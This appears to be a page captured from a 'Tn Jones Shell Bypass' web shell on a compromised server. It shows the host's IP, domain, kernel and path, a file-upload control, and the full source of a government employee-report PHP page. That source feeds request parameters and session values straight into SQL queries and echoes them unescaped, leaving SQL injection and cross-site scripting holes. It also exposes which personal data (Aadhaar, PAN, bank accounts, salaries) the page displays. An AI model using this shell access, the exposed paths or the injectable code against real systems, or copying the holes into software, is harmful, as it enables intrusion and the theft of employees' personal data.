Tn Jones Shell Bypass
:
3.15.3.153
:
160.187.54.56 / upgov.net
:
Linux 160-187-54-56.cprapid.com 4.18.0-553.22.1.lve.1.el7h.x86_64 #1 SMP Tue Oct 8 14:36:03 UTC 2024 x86_64
:
/
home
/
upgov
/
www
/
cenreport
/
pages
/
Upload File:
files >> //home/upgov/www/cenreport/pages/tables10.php
<?php include("../connection.php"); session_start(); if (!isset($_SESSION['User']) || ($_SESSION['password'] == '')) { header("location:..index.php"); exit(); } if(isset($_SESSION['User'])) { $name=$_SESSION['User']; } $user_query = mysql_query("select * from cen_login where User ='$name'")or die(mysql_error()); $user_row = mysql_fetch_array($user_query); $username = $user_row['User']; ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content=""> <meta name="author" content=""> <title>REPORT</title> <!-- Bootstrap Core CSS --> <link href="../bower_components/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet"> <!-- MetisMenu CSS --> <link href="../bower_components/metisMenu/dist/metisMenu.min.css" rel="stylesheet"> <!-- DataTables CSS --> <link href="../bower_components/datatables-plugins/integration/bootstrap/3/dataTables.bootstrap.css" rel="stylesheet"> <!-- DataTables Responsive CSS --> <link href="../bower_components/datatables-responsive/css/dataTables.responsive.css" rel="stylesheet"> <!-- Custom CSS --> <link href="../dist/css/sb-admin-2.css" rel="stylesheet"> <!-- Custom Fonts --> <link href="../bower_components/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css"> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script> <![endif]--> <link rel="stylesheet" type="text/css" href="css/style.css" /> </head> <body> <div id="wrapper"> <!-- Navigation --> <nav class="navbar navbar-default navbar-static-top" role="navigation" style="margin-bottom: 0"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="#"><font size='+2' color="Maroon"><b>DASHBOARD</b></font></a> </div> <!-- /.navbar-header --> <ul class="nav navbar-top-links navbar-right"> <li class="dropdown"> <ul class="nav" id="side-menu"> <li> <a href="report.php"><i class="fa fa-dashboard fa-fw"></i> <b>Centralised</b></a> </li> <li> <a href="report2.php"><i class="fa fa-table fa-fw"></i><b>Candidate Registartion</b></a> </li> <li> <a href="report4.php"><i class="fa fa-table fa-fw"></i> <b>Download Excel</b></a> </li> <li> <a href="report3.php"><i class="fa fa-table fa-fw"></i><b>Forms</b></a> </li> <li> <a href="report5.php"><i class="fa fa-table fa-fw"></i> <b>Old Report pamel</b></a> </li> <li> <a href="logout.php"><i class="fa fa-sign-out fa-fw"></i> <b>Logout</b></a> </li> <!-- <li> <a href=""><i class="fa fa-files-o fa-fw"></i><span class="fa arrow"></span></a> </li>--> </ul> <!-- /.dropdown-user --> </li> <!-- /.dropdown --> </ul> <!-- /.navbar-top-links --> <!-- /.navbar-static-side --> </nav> <div class="col-lg-12"> <form name="frm_image" method="post"> <?php $w=$_REQUEST["t1"]; $w2=$_REQUEST["t2"]; $w3=$_REQUEST["t3"]; $w4=$_REQUEST["t4"]; ?> <center> <table> <td><font color="black"><b>POSTNAME</b></font><br> <select name="t1" style="height:32px;width:300px;"/> <option value="<?php echo $w; ?>"><?php echo $w; ?></option> <option value='FWS TRAINER'>FWS TRAINER</option> <option value='MASTER TRAINER'>MASTER TRAINER</option> <option value='TECHNICAL ASSISTANT'>TECHNICAL ASSISTANT</option> <option value='COMPUTER OPERATOR'>COMPUTER OPERATOR</option> <option value='ACCOUNTANT'>ACCOUNTANT</option> <option value='OFFICE ASSISTANT'>OFFICE ASSISTANT</option> <option value='TECHNICAL EXPERT'>TECHNICAL EXPERT</option> </select> </td> <td><font color="black"><b>ACCOUNT NO</b></font><br> <input type='text' name="t3" style="height:32px;width:250px;" value="<?php echo $w3; ?>"/> </td> <td><font color="black"><b>EMP_ID</b></font><br><input type="text" name="t2" value="<?php echo $w2; ?>" style="font-weight:bold;height:30px;width:200px;" /> </td> <td><font color="black"><b>NAME</b></font><br><input type="text" name="t4" value="<?php echo $w4; ?>" style="font-weight:bold;height:30px;width:200px;" /> </td> <td> <br><input type="submit" value="Search" style="font-weight:bold;height:30px;width:80px;background:#2A5CAA;color:#FFF;" /></td> <td> <br><a href="http://cenreport.upgov.net/pages/report.php"><input type="button" value="Back" style="text-align:center;font-weight:bold;height:30px;width:80px;background:#2A5CAA;color:#FFF;" /></a></td> </center></table> <!-- /.row --> <?php //include of db config file include ('paginate.php'); //include of paginat page $per_page = 5; // number of results to show per page $result = mysql_query("SELECT * FROM cent_table1 where Emp_id like '$w2%' AND Account_no like '$w3%' AND Name like '$w4%' AND Post like '$w%' AND Scheme='UPWSRP' order by created_date DESC"); $total_results = mysql_num_rows($result); $total_pages = ceil($total_results / $per_page);//total pages we going to have //-------------if page is setcheck------------------// if (isset($_GET['page'])) { $show_page = $_GET['page']; //it will telles the current page if ($show_page > 0 && $show_page <= $total_pages) { $start = ($show_page - 1) * $per_page; $end = $start + $per_page; } else { // error - show first set of results $start = 0; $end = $per_page; } } else { // if page isn't set, show first set of results $start = 0; $end = $per_page; } // display pagination $page = intval($_GET['page']); $tpages=$total_pages; if ($page <= 0) $page = 1; ?> <div class="row"> <div class="col-lg-12"> <div class="panel panel-default"> <div class="panel-heading"> <b> UPWSRP EMPLOYEE LIST</b> </div> <?php $reload = $_SERVER['PHP_SELF'] . "?tpages=" . $tpages; echo "<div class='panel-body'>"; echo "<div class='table-responsive'>"; echo " <li align='left'> <a href='new_all_excel.php'><i class='fa fa-edit fa-fw'></i>Excel</a> </li>"; // display data in table echo "<table class='table table-striped table-bordered table-hover' style='font-size:12px;'>"; echo " <thead> <tr> <th>S.No</th><th >UPDATE</th><th>EMP_ID</th><th >PHOTOGRAPH</th> <th>DEPARTMENT</th><th>SCHEME</th><th>DESIGNATION</th><th>DISTRICT</th><th>POSTING PLACE</th> <th>TALLY OLD NAME</th><th>NAME</th> <th>FATHERNAME</th><th>MOBILE1</th><th>MOBILE2</th><th>EMAIL</th><th>MARITAL_STATUS</th><th>CATEGORY</th> <th>GENDER</th><th>DOB</th><th>TOTALAGE</th><th>PERMANENT_ADDRESS</th><th>ADD_DIST</th> <th>AADHARCARD</th><th>PANCARD</th><th>BANK PASSBOOK UPLOAD</th> <th>BANK_NAME</th><th>ACCOUNT_NO</th><th>IFSC</th> <th>BRANCH</th><th>UAN</th> <th>MEMBER_ID</th><th>EPF_NO</th> <th>EPF_DATE</th><th>ESI_NO</th><th>ESI_DATE</th><th>BASIC_SALARY</th> <th>HIGHSCHOOLROLL</th><th>HIGHSCHOOL</th><th>HIGH_SUB</th><th>HIGH_BOARD</th> <th>HIGH_YEAR</th> <th>HIGH_TOTAL</th> <th>HIGH_MO</th><th>HIGH_PER</th><th>INTER</th> <th>INTER_SUB</th><th>INTER_BOARD</th> <th>INTER_YEAR</th> <th>INTER_TOTAL</th> <th>INTER_MO</th><th>INTER_PER</th> <th>UG</th><th>UG_SUB</th><th>UG_BOARD</th> <th>UG_YEAR</th><th>UG_TOTAL</th><th>UG_MO</th><th>UG_PER</th> <th>PG</th><th>PG_SUB</th><th>PG_BOARD</th><th>PG_YEAR</th> <th>PG_TOTAL</th> <th>PG_MO</th><th>PG_PER</th><th>COMPUTERCOURSE</th> <th>DURATION</th><th>COMPANYNAME</th> <th>C_POST</th><th>TOT_EXP</th><th>IDPROOF</th> <th>ADDRESSPROOF</th><th>HIGHUPLOAD</th> <th>INTERUPLOAD</th><th>UGUPLAOD</th><th>PGUPLAOD</th> <th>COMPUTERUPLOAD</th><th>EXPUPLOAD</th><th>CASTUPLOAD</th><th>CREATED_DATE</th> <th>HANDICAP</th><th>HANDIUPLOAD</th> <th>STATUS</th> <th>REG_ID</th><th>TSN</th><th>COUNC_DATE</th> <th>JOIN_DATE</th><th>RESIGN_DATE</th> <th>REASON_DATE</th><th>DD_NO</th> <th>SEC_RECPT_NO</th> </tr> </thead>"; // loop through results of database query, displaying them in the table $count1=0; for ($i = $start; $i < $end; $i++) { $count1=$i+1; // make sure that PHP doesn't try to show results that don't exist if ($i == $total_results) { break; } // echo out the contents of each row into a table echo " <tbody>"; echo "<tr " . $cls . " class='odd gradeX'>"; ?> <td style='padding: 40px 0;text-align: center;'><?php echo $count1;?></td> <td style='padding: 40px 0;text-align: center;'><a href='update_form.php?id=<?php echo mysql_result($result, $i, 'Emp_id');?>'><font size="+1">Update</font></a></td> <td style='padding: 40px 0;text-align: center;'><input type='text' name='empid' value='<?php echo mysql_result($result, $i, 'Emp_id');?>' style='width:80px;height:30px;'/></td> <td ><a href='http://onlineform.upgov.net/old_emp/<?php echo mysql_result($result, $i, 'Pic');?>'><img src='http://onlineform.upgov.net/old_emp/<?php echo mysql_result($result, $i, 'Pic');?>'></a></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Department');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Scheme');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Postname');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'District');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Sub_location');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Oldname');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Name')?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'FatherName')?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Mobile1');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Mobile2');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Email');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'marital_status');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Category')?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Gender');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Dob') ;?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Totalage');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Address');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Add_dist');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Aadharcard');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'pancard');?></td> <td style='padding: 40px 0;text-align: center;'><a target='_blank' href='http://onlineform.upgov.net/old_emp/<?php echo mysql_result($result, $i, 'bankpass');?>'><?php echo mysql_result($result, $i, 'bankpass');?></a></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Bank_name');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Account_no');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'IFSC');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Branch');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'UAN');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Member_Id');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'EPF_No');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'EPF_Date');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'ESI_No');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'ESI_Date');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Basic_salary');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Highschoolroll');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Highschool');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'High_sub');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'High_board');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'High_year');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'High_total');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'High_mo');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'High_per');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Inter');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Inter_sub');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Inter_board');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Inter_year');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Inter_total');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Inter_mo');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Inter_per');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Ug');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Ug_sub');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Ug_board');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Ug_year');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Ug_total');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Ug_mo');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Ug_per');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Pg');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Pg_sub');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Pg_board');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Pg_year');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Pg_total');?><td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Pg_mo');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Pg_per');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Computercourse');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Companyname');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'C_Post');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Tot_exp');?></td> <td style='padding: 40px 0;text-align: center;'><a target='_blank' href='http://onlineform.upgov.net/old_emp/<?php echo mysql_result($result, $i, 'Idproof')?>'><?php echo mysql_result($result, $i, 'Idproof');?></a></td> <td style='padding: 40px 0;text-align: center;'><a target='_blank' href='http://onlineform.upgov.net/old_emp/<?php echo mysql_result($result, $i, 'Addressproof');?>'><?php echo mysql_result($result, $i, 'Addressproof');?></a></td> <td style='padding: 40px 0;text-align: center;'><a target='_blank' href='http://onlineform.upgov.net/old_emp/<?php echo mysql_result($result, $i, 'highupload');?>'><?php echo mysql_result($result, $i, 'highupload');?></a></td> <td style='padding: 40px 0;text-align: center;'><a target='_blank' href='http://onlineform.upgov.net/old_emp/<?php echo mysql_result($result, $i, 'interupload');?>'><?php echo mysql_result($result, $i, 'interupload');?></a></td> <td style='padding: 40px 0;text-align: center;'><a target='_blank' href='http://onlineform.upgov.net/old_emp/<?php echo mysql_result($result, $i, 'uguplaod');?>'><?php echo mysql_result($result, $i, 'uguplaod');?></a></td> <td style='padding: 40px 0;text-align: center;'><a target='_blank' href='http://onlineform.upgov.net/old_emp/<?php echo mysql_result($result, $i, 'pguplaod');?>'><?php echo mysql_result($result, $i, 'pguplaod');?></a></td> <td style='padding: 40px 0;text-align: center;'><a target='_blank' href='http://onlineform.upgov.net/old_emp/<?php echo mysql_result($result, $i, 'computerupload');?>'><?php echo mysql_result($result, $i, 'computerupload');?></a></td> <td style='padding: 40px 0;text-align: center;'><a target='_blank' href='http://onlineform.upgov.net/old_emp/<?php echo mysql_result($result, $i, 'expupload');?>'><?php echo mysql_result($result, $i, 'expupload');?></a></td> <td style='padding: 40px 0;text-align: center;'><a target='_blank' href='http://onlineform.upgov.net/old_emp/<?php echo mysql_result($result, $i, 'castupload');?>'><?php echo mysql_result($result, $i, 'castupload');?></a></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'created_date');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'handicap');?></td> <td style='padding: 40px 0;text-align: center;'><a target='_blank' href='http://onlineform.upgov.net/old_emp/<?php echo mysql_result($result, $i, 'handiupload');?>'><?php echo mysql_result($result, $i, 'handiupload');?></a></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'status');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Reg_id');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'TSN');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'counc_date');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Join_date');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Resign_date');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Reason_date');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'DD_No');?></td> <td style='padding: 40px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Sec_recpt_no');?></td> </tr> <?php echo " </tbody>"; } // close table> echo "</table>"; echo '<div class="pagination"><ul>'; if ($total_pages > 1) { echo paginate($reload, $show_page, $total_pages); } echo "</ul></div>"; // pagination ?> </div> <!-- /.table-responsive --> </div> <!-- /.panel-body --> </div> <!-- /.panel --> </div> <!-- /.col-lg-12 --> </div> </div> <!-- /#wrapper --> <!-- jQuery --> <script src="../bower_components/jquery/dist/jquery.min.js"></script> <!-- Bootstrap Core JavaScript --> <script src="../bower_components/bootstrap/dist/js/bootstrap.min.js"></script> <!-- Metis Menu Plugin JavaScript --> <script src="../bower_components/metisMenu/dist/metisMenu.min.js"></script> <!-- DataTables JavaScript --> <script src="../bower_components/datatables/media/js/jquery.dataTables.min.js"></script> <script src="../bower_components/datatables-plugins/integration/bootstrap/3/dataTables.bootstrap.min.js"></script> <!-- Custom Theme JavaScript --> <script src="../dist/js/sb-admin-2.js"></script> <!-- Page-Level Demo Scripts - Tables - Use for reference --> <script> $(document).ready(function() { $('#dataTables-example').DataTable({ responsive: true }); }); </script> </body> </html>